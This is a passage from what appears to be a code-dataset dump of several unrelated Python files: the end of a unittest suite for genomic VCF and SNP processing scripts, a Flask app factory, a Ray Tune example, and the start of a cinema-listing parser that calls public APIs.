str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_groom_cravat_annotation_for_noncoding_variants_tab( self ):\n \"\"\"\n Test groom_cravat_annotation for a noncoding variants tab file.\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_cravat_annotation.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, 
\"test_groom_cravat_annotations_noncoding.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_cravat_annotations_noncoding_ANSWER.tab\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_cravat_annotations_noncoding.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# groom_vcf_gatk.py\n def test_groom_vcf_gatk_for_good_vcf( self ):\n \"\"\"\n Test filter_groom_vcf_gatk for a vcf not needed to be filtered\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_vcf.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_for_good_vcf_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_vcf_gatk_for_good_vcf.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_groom_vcf_gatk_for_remove_spaces_vcf( self ):\n \"\"\"\n Test filter_groom_vcf_gatk for a vcf which needs spaces removed.\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_vcf.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_spaces.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_for_remove_spaces_vcf_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_vcf_gatk_for_remove_spaces_vcf.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_groom_vcf_gatk_for_42features_vcf( self ):\n \"\"\"\n Test filter_groom_vcf_gatk for a vcf with VCF 4.2 features\n \"\"\"\n # Create test environment\n str_groom_script = os.path.join( self.str_script_dir, \"groom_vcf.py\" )\n str_test_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_42features.vcf\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_groom_vcf_gatk_for_42features_vcf_ANSWER.vcf\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_groom_vcf_gatk_for_42features_vcf.vcf\" )\n self.func_make_dummy_dir( 
self.str_test_data_dir_working )\n self.func_make_dummy_dir( self.str_test_data_dir )\n # Call Example script\n str_command = \" \".join( [ str_groom_script, str_test_file, str_result_file ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# reduce_vcf_to_snps.py\n def test_reduce_vcf_to_snp_for_small_file_no_filter( self ):\n \"\"\"\n Test reducing the vcf file to snps for a file that is small (less than 100) and should not be filtered.\n \"\"\"\n # Create test environment\n str_filtered_vcf_script = os.path.join( self.str_script_dir, \"reduce_vcf_to_snps.py\" )\n str_filtered_vcf_test_file = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_no_filter.vcf\" )\n str_filtered_vcf = os.path.join( self.str_test_data_dir_working, \"test_reduce_vcf_to_snp_for_small_file_no_filter_RESULT.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_filtered_vcf_script, \"--reference\", str_filtered_vcf_test_file, str_filtered_vcf ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_filtered_vcf, str_filtered_vcf_test_file )\n # Destroy environment\n self.func_remove_files( [ str_filtered_vcf ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def test_reduce_vcf_to_snp_for_small_file_filter_reference( self ):\n \"\"\"\n Test reducing the vcf file to snps for a file that is small (less than 100) and should be filtered.\n When filtering as a reference, it will not have PASS info so this is ignored.\n \"\"\"\n\n # Create test environment\n str_filtered_vcf_script = os.path.join( self.str_script_dir, \"reduce_vcf_to_snps.py\" )\n str_filtered_vcf_test_file = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_filter.vcf\" )\n str_filtered_vcf_answer = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_filter_reference_ANSWER.vcf\" )\n str_filtered_vcf_result = os.path.join( self.str_test_data_dir_working, \"test_reduce_vcf_to_snp_for_small_file_filter_reference_RESULT.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n\n # Call Example script\n str_command = \" \".join( [ str_filtered_vcf_script, \"--reference\", str_filtered_vcf_test_file, str_filtered_vcf_result ] )\n Commandline.Commandline().func_CMD( str_command )\n\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_filtered_vcf_answer, str_filtered_vcf_result )\n\n # Destroy environment\n self.func_remove_files( [ str_filtered_vcf_result ] )\n\n # Evaluate\n self.func_test_true( f_success )\n\n def test_reduce_vcf_to_snp_for_small_file_filter( self ):\n \"\"\"\n Test reducing the vcf file to snps for a file that is small (less than 100) and should be filtered.\n \"\"\"\n\n # Create test environment\n str_filtered_vcf_script = os.path.join( self.str_script_dir, \"reduce_vcf_to_snps.py\" )\n str_filtered_vcf_test_file = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_filter.vcf\" )\n str_filtered_vcf_answer = os.path.join( self.str_test_data_dir, \"test_reduce_vcf_to_snp_for_small_file_filter_ANSWER.vcf\" )\n str_filtered_vcf_result = os.path.join( self.str_test_data_dir_working, 
\"test_reduce_vcf_to_snp_for_small_file_filter_RESULT.vcf\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n\n # Call Example script\n str_command = \" \".join( [ str_filtered_vcf_script, str_filtered_vcf_test_file, str_filtered_vcf_result ] )\n Commandline.Commandline().func_CMD( str_command )\n\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_filtered_vcf_answer, str_filtered_vcf_result )\n\n # Destroy environment\n self.func_remove_files( [ str_filtered_vcf_result ] )\n\n # Evaluate\n self.func_test_true( f_success )\n\n# vcfs_to_snp_calls_tab.py\n def test_vcfs_to_snp_calls_tab_filter_maf_vcf( self ):\n \"\"\"\n Test vcfs_to_snp_calls_tab.py with filtering. Inputs are maf and vcf files.\n \"\"\"\n # Create test environment\n str_snp_calls_script = os.path.join( self.str_script_dir, \"vcfs_to_snp_calls_tab.py\" )\n str_snp_calls_input_file_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter.maf\" )\n str_maf_tumor_key = \"test\"\n str_snp_calls_input_file_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.vcf\" )\n str_snp_calls_input_depth_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.depth\" )\n str_snp_calls_input_depth_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.depth\" )\n str_snp_calls_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter_maf_vcf_1_ANSWER_sorted.tab\" )\n str_snp_calls_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_snp_calls_tab_filter_maf_vcf_1_RESULT.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_snp_calls_script, \"--maf_reference\", str_snp_calls_input_file_1, \"--tumor\", str_maf_tumor_key,\n \"--vcf\", str_snp_calls_input_file_2, \"--count_reference\", str_snp_calls_input_depth_1,\n \"--count\", str_snp_calls_input_depth_2, str_snp_calls_result ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n lstr_answer_lines = None\n with open( str_snp_calls_answer, \"r\" ) as hndl_answer:\n lstr_answer_lines = [ str_line for str_line in hndl_answer.read().split(\"\\n\") if str_line ]\n lstr_answer_lines.sort()\n lstr_result_lines = None\n with open( str_snp_calls_result, \"r\" ) as hndl_result:\n lstr_result_lines = [ str_line for str_line in hndl_result.read().split(\"\\n\") if str_line ]\n lstr_result_lines.sort()\n # Destroy environment\n self.func_remove_files( [ str_snp_calls_result ] )\n # Evaluate\n self.func_test_equals( \"\\n\".join( lstr_answer_lines), \"\\n\".join( lstr_result_lines ) )\n\n def test_vcfs_to_snp_calls_tab_filter_maf_vcf_2( self ):\n \"\"\"\n Test vcfs_to_snp_calls_tab.py with filtering. 
Inputs are maf and vcf 2 files.\n \"\"\"\n # Create test environment\n str_snp_calls_script = os.path.join( self.str_script_dir, \"vcfs_to_snp_calls_tab.py\" )\n str_snp_calls_input_file_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter.maf\" )\n str_maf_tumor_key = \"test\"\n str_snp_calls_input_file_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_2_filter.vcf\" )\n str_snp_calls_input_depth_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.depth\" )\n str_snp_calls_input_depth_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_2_filter.depth\" )\n str_snp_calls_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter_maf_vcf_2_ANSWER_sorted.tab\" )\n str_snp_calls_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_snp_calls_tab_filter_maf_vcf_2_RESULT.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_snp_calls_script, \"--maf_reference\", str_snp_calls_input_file_1, \"--tumor\", str_maf_tumor_key,\n \"--vcf\", str_snp_calls_input_file_2, \"--count_reference\", str_snp_calls_input_depth_1,\n \"--count\", str_snp_calls_input_depth_2, str_snp_calls_result ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n lstr_answer_lines = None\n with open( str_snp_calls_answer, \"r\" ) as hndl_answer:\n lstr_answer_lines = [ str_line for str_line in hndl_answer.read().split(\"\\n\") if str_line ]\n lstr_answer_lines.sort()\n lstr_result_lines = None\n with open( str_snp_calls_result, \"r\" ) as hndl_result:\n lstr_result_lines = [ str_line for str_line in hndl_result.read().split(\"\\n\") if str_line ]\n lstr_result_lines.sort()\n # Destroy environment\n self.func_remove_files( [ str_snp_calls_result ] )\n # Evaluate\n self.func_test_equals( \"\\n\".join( lstr_answer_lines), \"\\n\".join( lstr_result_lines ) )\n\n def test_vcfs_to_snp_calls_tab_filter_vcf_1_2( self ):\n \"\"\"\n Test vcfs_to_snp_calls_tab.py with filtering. 
Inputs are and vcf 1 and 2 files.\n \"\"\"\n # Create test environment\n str_snp_calls_script = os.path.join( self.str_script_dir, \"vcfs_to_snp_calls_tab.py\" )\n str_snp_calls_input_file_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.vcf\" )\n str_snp_calls_input_file_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_2_filter.vcf\" )\n str_snp_calls_input_depth_1 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_1_filter.depth\" )\n str_snp_calls_input_depth_2 = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_2_filter.depth\" )\n str_snp_calls_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_snp_calls_tab_filter_vcf_1_2_ANSWER_sorted.tab\" )\n str_snp_calls_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_snp_calls_tab_filter_vcf_1_2_RESULT.tab\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_snp_calls_script, \"--vcf_reference\", str_snp_calls_input_file_1,\n \"--vcf\", str_snp_calls_input_file_2, \"--count_reference\", str_snp_calls_input_depth_1,\n \"--count\", str_snp_calls_input_depth_2, str_snp_calls_result ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n lstr_answer_lines = None\n with open( str_snp_calls_answer, \"r\" ) as hndl_answer:\n lstr_answer_lines = [ str_line for str_line in hndl_answer.read().split(\"\\n\") if str_line ]\n lstr_answer_lines.sort()\n lstr_result_lines = None\n with open( str_snp_calls_result, \"r\" ) as hndl_result:\n lstr_result_lines = [ str_line for str_line in hndl_result.read().split(\"\\n\") if str_line ]\n lstr_result_lines.sort()\n # Destroy environment\n self.func_remove_files( [ str_snp_calls_result ] )\n # Evaluate\n self.func_test_equals( \"\\n\".join( lstr_answer_lines), \"\\n\".join( lstr_result_lines ) )\n\n# vcfs_to_genotype_matrix.py\n# This is for validation only, not for the pipeline runs.\n# Under development.\n def not_test_vcfs_to_genotype_matrix_1_file( self ):\n \"\"\"\n Test vcfs_to_genotype_matrix.py with one input file.\n \"\"\"\n # Create test environment\n str_genotype_script = os.path.join( self.str_script_dir, \"vcfs_to_genotype_matrix.py\" )\n str_vcf_directory = os.path.join( self.str_test_data_dir, \"test_vcf_genotype_matrix_dir_1\" )\n str_genotype_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_genotype_matrix_1_ANSWER.txt\" )\n str_genotype_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_genotype_matrix_1_RESULT.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_genotype_script, \"--matrix\", str_genotype_result, str_vcf_directory ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_genotype_answer, str_genotype_result )\n # Destroy environment\n self.func_remove_files( [ str_genotype_result ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def not_test_vcfs_to_genotype_matrix_3_file( self ):\n \"\"\"\n Test vcfs_to_genotype_matrix.py with one input file in one directory and 2 in another.\n \"\"\"\n # Create test environment\n str_genotype_script = os.path.join( self.str_script_dir, \"vcfs_to_genotype_matrix.py\" )\n str_vcf_directory_1 = os.path.join( self.str_test_data_dir, \"test_vcf_genotype_matrix_dir_1\" )\n str_vcf_directory_2 = os.path.join( self.str_test_data_dir, \"test_vcf_genotype_matrix_dir_2\" 
)\n str_genotype_answer = os.path.join( self.str_test_data_dir, \"vcfs_to_genotype_matrix_3_ANSWER.txt\" )\n str_genotype_result = os.path.join( self.str_test_data_dir_working, \"vcfs_to_genotype_matrix_3_RESULT.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call Example script\n str_command = \" \".join( [ str_genotype_script, \"--matrix\", str_genotype_result, str_vcf_directory_1, str_vcf_directory_2 ] )\n Commandline.Commandline().func_CMD( str_command )\n # Check test environment for results\n f_success = self.func_are_files_equivalent( str_genotype_answer, str_genotype_result )\n # Destroy environment\n self.func_remove_files( [ str_genotype_result ] )\n # Evaluate\n self.func_test_true( f_success )\n\n# visualize_mutation_depth_tab_files.R\n# This is for validation only, not for the pipeline runs.\n# Under development.\n def not_test_visualize_mutation_depth_tab_files_for_error_counts_opt( self ):\n \"\"\"\n Tests to make sure the TP, FP, FN, senstivity, and specificity measurements are correct from a test data set.\n This is testing output that has a changing feature space (optimization figure) and not the \"ROC\" plot.\n \"\"\"\n # Create environment\n str_vis_script = os.path.join( self.str_script_dir, \"visualize_mutation_depth_tab_files.R\" )\n str_test_input_file = os.path.join( self.str_test_data_dir, \"test_visualize_tab.tab\" )\n str_answer_file = os.path.join( self.str_test_data_dir, \"test_visualize_mutation_depth_tab_files_for_error_counts_opt_ANSWER.txt\" )\n str_result_file = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_data.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call example script\n str_command = \" \".join( [ str_vis_script, \"-o\", self.str_test_data_dir_working, \"-k RNA_DNA\", str_test_input_file ])\n Commandline.Commandline().func_CMD( str_command )\n # Check for sucess\n f_success = self.func_are_files_equivalent( str_answer_file, str_result_file )\n # Destroy environment\n self.func_remove_files( [ str_result_file, os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_depth_distributions.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_fdr_min_read_coverage_norm.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_data_truth_held.txt\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_optimize_detail_validation.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_raw_class_distributions_detail_validation.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_roc_detail_validation.pdf\" ),\n os.path.join( self.str_test_data_dir_working, \"test_visualize_tab.tab_sensitivity_min_read_coverage_norm.pdf\" ) ] )\n self.func_remove_dirs( [ self.str_test_data_dir_working ] )\n # Evaluate\n self.func_test_true( f_success )\n\n def not_test_visualize_mutation_depth_tab_files_for_error_counts_roc( self ):\n \"\"\"\n Tests to make sure the TP, FP, FN, senstivity, and specificity measurements are correct from a test data set.\n This is testing output that has a set feature space (the \"ROC\" plot) and not the optimization plot.\n \"\"\"\n # Create environment\n str_vis_script = os.path.join( self.str_script_dir, \"visualize_mutation_depth_tab_files.R\" )\n str_test_input_file = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab\" )\n str_answer_file_1 = os.path.join( self.str_test_data_dir, 
\"test_visualize_tab_roc.tab_data_roc_1_answer.txt\" )\n str_answer_file_2 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_2_answer.txt\" )\n str_answer_file_3 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_3_answer.txt\" )\n str_answer_file_4 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_4_answer.txt\" )\n str_result_file_1 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_1.txt\" )\n str_result_file_2 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_2.txt\" )\n str_result_file_3 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_3.txt\" )\n str_result_file_4 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_4.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call example script\n str_command = \" \".join( [ str_vis_script, \"-o\", self.str_test_data_dir_working, \"-k RNA_DNA\", str_test_input_file ])\n Commandline.Commandline().func_CMD( str_command )\n # Check for sucess\n f_success_1 = self.func_are_files_equivalent( str_answer_file_1, str_result_file_1 )\n f_success_2 = self.func_are_files_equivalent( str_answer_file_2, str_result_file_2 )\n f_success_3 = self.func_are_files_equivalent( str_answer_file_3, str_result_file_3 )\n f_success_4 = self.func_are_files_equivalent( str_answer_file_4, str_result_file_4 )\n # Destroy environment\n# self.func_remove_files( [ os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_depth_distributions.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_fdr_min_read_coverage_norm.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data.txt\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_raw_class_distributions_detail_validation.pdf\" ),\n # os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_roc.pdf\" ),\n # os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_optimize_detail_validation.pdf\" ),\n # os.path.join( str_result_file_1 ),\n # os.path.join( str_result_file_2 ),\n # os.path.join( str_result_file_3 ),\n # os.path.join( str_result_file_4 ),\n # os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_sensitivity_min_read_coverage_norm.pdf\" ) ] )\n # self.func_remove_dirs( [ self.str_test_data_dir_working ] )\n # Evaluate\n self.func_test_true( f_success_1 and f_success_2 and f_success_3 and f_success_4 )\n\n def not_test_visualize_mutation_depth_tab_files_for_roc_like_rnaseq( self ):\n \"\"\"\n Tests to make sure the TP, FP, FN, senstivity, and specificity measurements are correct from a test data set.\n This is testing output that has a set feature space (the \"ROC\" plot) and not the optimization plot.\n\n The other test uses a simple input data set similar to traditional ROC data, this one have varying RNA seq depth and\n such that allows a more authentic test.\n \"\"\"\n # Create environment\n str_vis_script = os.path.join( self.str_script_dir, \"visualize_mutation_depth_tab_files.R\" )\n str_test_input_file = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc_like_rnaseq.tab\" )\n str_answer_file_1 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_1_answer.txt\" )\n str_answer_file_2 = os.path.join( self.str_test_data_dir, 
\"test_visualize_tab_roc.tab_data_roc_like_ranseq_2_answer.txt\" )\n str_answer_file_3 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_3_answer.txt\" )\n str_answer_file_4 = os.path.join( self.str_test_data_dir, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_4_answer.txt\" )\n str_result_file_1 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_1.txt\" )\n str_result_file_2 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_2.txt\" )\n str_result_file_3 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_3.txt\" )\n str_result_file_4 = os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc.tab_data_roc_like_rnaseq_4.txt\" )\n self.func_make_dummy_dir( self.str_test_data_dir_working )\n # Call example script\n str_command = \" \".join( [ str_vis_script, \"-o\", self.str_test_data_dir_working, \"-k RNA_DNA\", str_test_input_file ])\n Commandline.Commandline().func_CMD( str_command )\n # Check for sucess\n f_success_1 = self.func_are_files_equivalent( str_answer_file_1, str_result_file_1 )\n f_success_2 = self.func_are_files_equivalent( str_answer_file_2, str_result_file_2 )\n f_success_3 = self.func_are_files_equivalent( str_answer_file_3, str_result_file_3 )\n f_success_4 = self.func_are_files_equivalent( str_answer_file_4, str_result_file_4 )\n # Destroy environment\n# self.func_remove_files( [ os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_depth_distributions.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_fdr_min_read_coverage_norm.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_data.txt\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_raw_class_distributions_detail_validation.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_roc.pdf\" ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_optimize_detail_validation.pdf\" ),\n# os.path.join( str_result_file_1 ),\n# os.path.join( str_result_file_2 ),\n# os.path.join( str_result_file_3 ),\n# os.path.join( str_result_file_4 ),\n# os.path.join( self.str_test_data_dir_working, \"test_visualize_tab_roc_like_rnaseq.tab_sensitivity_min_read_coverage_norm.pdf\" ) ] )\n # self.func_remove_dirs( [ self.str_test_data_dir_working ] )\n # Evaluate\n self.func_test_true( f_success_1 and f_success_2 and f_success_3 and f_success_4 )\n\n# Creates a suite of tests\ndef suite():\n return unittest.TestLoader().loadTestsFromTestCase( ScriptTester )\n"} {"ext": "py", "sha": "1a31482b056d765cca1ff45d2969e3da585ccfb8", "content": "from flask import Flask\nfrom config import config_options\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_uploads import UploadSet,configure_uploads,IMAGES\nfrom flask_mail import Mail\n\nbootstrap = Bootstrap()\n\ndb = SQLAlchemy()\n\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.login_view = 'auth.login'\n\nphotos = UploadSet('photos',IMAGES)\n\nmail = Mail()\n\ndef create_app(config_name):\n\n app = Flask(__name__)\n\n # Creating the app configurations\n app.config.from_object(config_options[config_name])\n\n # Initializing flask 
extensions\n bootstrap.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n mail.init_app(app)\n \n # configure UploadSet\n configure_uploads(app,photos)\n\n # Registering the blueprints\n from .rental_hub import rental_hub as rental_hub_blueprint\n app.register_blueprint(rental_hub_blueprint)\n\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint,url_prefix = '/authenticate')\n\n \n\n return app\n"} {"ext": "py", "sha": "1a314856063667ae07023040d95eb91d76c46511", "content": "\"\"\"Test of Ray-tune without RLLib\"\"\"\nfrom ray import tune\n\n\ndef objective(step, alpha, beta):\n return (0.1 + alpha * step / 100)**(-1) + beta * 0.1\n\n\ndef train(config):\n alpha, beta = config[\"alpha\"], config[\"beta\"]\n for step in range(10):\n score = objective(step, alpha, beta)\n tune.report(mean_loss=score)\n\n\nanalysis = tune.run(\n train,\n config={\n \"alpha\": tune.grid_search([0.001, 0.01]),\n \"beta\": tune.choice([1, 2])\n })\n\nprint(\"Best config: \", analysis.get_best_config(metric=\"mean_loss\", mode=\"min\"))\n"} {"ext": "py", "sha": "1a314b307aa544252aa42c8ee155003b1a28b4aa", "content": "from concurrent import futures\nfrom bs4 import BeautifulSoup\nimport pprint\nimport concurrent\nimport requests\nimport re\nimport time\nimport sys\n\nMILE_TO_KM = 1.60934\nCINEMA_MATCH_REGEX = r\"(?P<cinema>[^,]*)\"\nNUM_OF_CINEMAS = 25\n\n# TODO: PLEASE DON'T USE THESE METHODS TOO MUCH. THEY ACTUALLY QUERY THE API.\n# IF YOU'RE GOING TO USE A LOT, SAVE THE DATA YOURSELF FOR TESTING.\nCINEMAS = []\nCINEMA_CID = {}\nCINEMA_DIST = {}\nF_TO_CINEMAS = {}\nFCID_TO_TIMES = {}\nF_CINEMA_TO_TIMES = {}\n\n\nclass DataParser:\n def get_cinemas_latlong(self, latitude, longitude):\n \"\"\"\n Give this function a longitude and latitude and CINEMAS, CINEMA_IDS and\n DISTANCES lists are populated with (up to) 5 results.\n \"\"\"\n print latitude, longitude\n sys.stdout.flush()\n global CINEMAS, CINEMA_CID, CINEMA_DIST\n film_names = requests.get(\n \"https://api.cinelist.co.uk/search/cinemas/coordinates/{}/{}\".\n format(latitude, longitude))\n cinemas = film_names.json()[\"cinemas\"][:NUM_OF_CINEMAS]\n for i in cinemas:\n # Runs regex over cinemas to remove the location\n cinema_name = re.match(CINEMA_MATCH_REGEX, i['name']).group(\"cinema\")\n # Dict storing {cinema name: cinema ID}\n CINEMA_CID[cinema_name] = i['id']\n # Converts distance from mile to km and rounds to 3dp.\n # Dict storing {cinema name: distance}\n CINEMA_DIST[cinema_name] = round(i['distance'] * MILE_TO_KM, 3)\n\n def get_latlong(self, postcode):\n \"\"\"\n Give this function a postcode and get the corresponding latitude and\n longitude.\n \"\"\"\n location_data = requests.get(\n \"http://api.postcodes.io/postcodes/{}\".format(postcode))\n location_data = location_data.json()\n latitude = location_data['result']['latitude']\n longitude = location_data['result']['longitude']\n return round(latitude, 6), round(longitude, 6)\n\n def get_cinema_url(self, cinema):\n search_url = 'https://www.google.co.uk/search?q=' + cinema\n res = requests.get(search_url)\n soup = BeautifulSoup(res.text, \"lxml\")\n\n # Parsing the html page to get the first url link in the google search\n # results, which will be the wikipedia page link\n g_search_res = soup.select('.r a')\n\n if not g_search_res:\n print 'VERY BAD: No google search results could be obtained'\n sys.stdout.flush()\n return ''\n\n fst_ref_url = g_search_res[0].get('href')\n\n if not fst_ref_url:\n print 'RED ALERT: First google search result has no href 
